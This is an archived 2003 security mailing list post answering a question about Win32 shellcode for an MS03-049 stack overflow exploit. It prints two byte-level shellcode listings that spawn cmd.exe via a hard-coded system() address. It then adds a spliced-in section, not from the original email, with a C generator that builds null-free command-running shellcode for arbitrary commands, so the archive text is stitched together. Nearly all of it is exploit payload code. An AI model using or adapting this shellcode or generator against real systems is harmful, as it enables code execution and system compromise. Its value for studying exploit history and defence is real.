Vulnerability Development mailing list archives

RE: [PenTest] Re: Win32 Shellcode question.


From: "Brett Moore" <brett.moore () security-assessment com>
Date: Tue, 2 Dec 2003 11:34:30 +1300


http://www.newroot.de/projects/winsys.c
// very small win2000/NT local shellcode (smallest I've seen)
/* 26-byte execute system("cmd.exe "); written by newroot */
unsigned char hellcode[]=
      "\x8b\xec"                              //      mov     ebp, esp
      "\x55"                                  //      push    ebp
      "\x8b\xec"                              //      mov     ebp, esp
      "\x68\x65\x78\x65\x20"                  //      push    0x20657865
      "\x68\x63\x6d\x64\x2e"                  //      push    0x2e646d63
      "\x8d\x45\xf8"                          //      lea     eax,[ebp-0x8]
      "\x50"                                  //      push    eax
      "\xb8"                                  //      mov     eax,
      "\xad\xaa\x01\x78"                      //      0x7801aaad <- address of system() (hard-coded, specific to one OS/DLL build)
      "\xff\xd0"                              //      call    eax
      ;

; 14-byte, no null byte, execute system("cmd")
54                   push        esp            ; or pushf to put null terminator on stack
68 63 6D 64 20       push        20646D63h      ; push "cmd " (trailing space fills the dword, no null needed)
54                   push        esp            ; push location of "cmd " = argument to system()
B8 BF 8E 01 78       mov         eax,78018EBFh  ; address of system() (hard-coded, specific to one OS/DLL build)
FF D0                call        eax            ; call system


-----Original Message-----
From: Tobias Klein [mailto:tobias.klein () ewetel de]
Sent: Monday, December 01, 2003 9:07 PM
To: Vinay A. Mahadik; vuln-dev () securityfocus com;
pentest () yahoogroups com
Subject: [PenTest] Re: Win32 Shellcode question.


http://www.newroot.de/projects/winsys.c
greets newroot

At 19:29 27.11.2003 -0800, Vinay A. Mahadik wrote:
I was writing an exploit for the MS03-049 services.exe
stack overflow vuln

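The two listings above build their command string on the stack with `push imm32` and hand `esp` to `system()`. As an added example (not code from this post, from newroot's winsys.c, or from anything else on this page), here is a small C generator for that stack-string pattern. It pads nothing itself: the caller must supply a command whose length is a multiple of four (which is why both listings use "cmd " and "cmd.exe " with a trailing space), and it checks the result for null bytes, since a string-copy overflow would truncate there. The function names and the `is_null_free` check are mine; given Brett's `system()` address it reproduces his 14-byte sequence exactly.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/*
 * Emit one `push imm32` (0x68 + 4 bytes) per 4-byte chunk of `s`, last chunk
 * first, so that after the pushes the string reads forward from esp.
 * `s` must be a non-empty multiple of 4 bytes; returns 0 on error.
 */
static size_t emit_stack_string(uint8_t *out, size_t cap, const char *s)
{
    size_t len = strlen(s);
    size_t n = 0;
    if (len == 0 || len % 4 != 0)
        return 0;
    for (size_t off = len; off > 0; off -= 4) {
        if (n + 5 > cap)
            return 0;
        out[n++] = 0x68;                    /* push imm32 */
        memcpy(out + n, s + off - 4, 4);    /* x86 is little-endian: bytes land in string order */
        n += 4;
    }
    return n;
}

/*
 * Same construction as the 14-byte listing:
 *   push esp ; push <cmd chunks> ; push esp ; mov eax, system ; call eax
 * The leading `push esp` stores a stack address just above the string; its
 * top byte is 0x00 on a typical user-mode stack, which terminates the string.
 * Returns the shellcode length, or 0 if the buffer is too small or `cmd`
 * is not a multiple of 4 bytes.
 */
size_t build_system_shellcode(uint8_t *out, size_t cap,
                              const char *cmd, uint32_t system_addr)
{
    size_t n = 0, m;
    if (cap < 1)
        return 0;
    out[n++] = 0x54;                        /* push esp: terminator above the string */
    m = emit_stack_string(out + n, cap - n, cmd);
    if (m == 0)
        return 0;
    n += m;
    if (n + 8 > cap)
        return 0;
    out[n++] = 0x54;                        /* push esp: pointer to the string = argument */
    out[n++] = 0xB8;                        /* mov eax, imm32 */
    out[n++] = (uint8_t)(system_addr);
    out[n++] = (uint8_t)(system_addr >> 8);
    out[n++] = (uint8_t)(system_addr >> 16);
    out[n++] = (uint8_t)(system_addr >> 24);
    out[n++] = 0xFF;                        /* call eax */
    out[n++] = 0xD0;
    return n;
}

/* 1 if no byte is 0x00, i.e. the buffer survives a strcpy-style copy. */
int is_null_free(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (buf[i] == 0)
            return 0;
    return 1;
}

int main(void)
{
    uint8_t sc[64];
    /* Address taken from the 14-byte listing above; it is build-specific. */
    size_t n = build_system_shellcode(sc, sizeof sc, "cmd ", 0x78018EBFu);
    printf("%zu bytes, null-free=%d:", n, is_null_free(sc, n));
    for (size_t i = 0; i < n; i++)
        printf(" %02X", sc[i]);
    printf("\n");
    return 0;
}
```

The null-byte check matters because the hard-coded `system()` address is part of the encoded bytes: an address such as 0x7801AAAD or 0x78018EBF happens to contain no zero byte, but a different DLL build could place `system()` at one that does, and the generator would then report the shellcode as unusable for a string-copy overflow.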



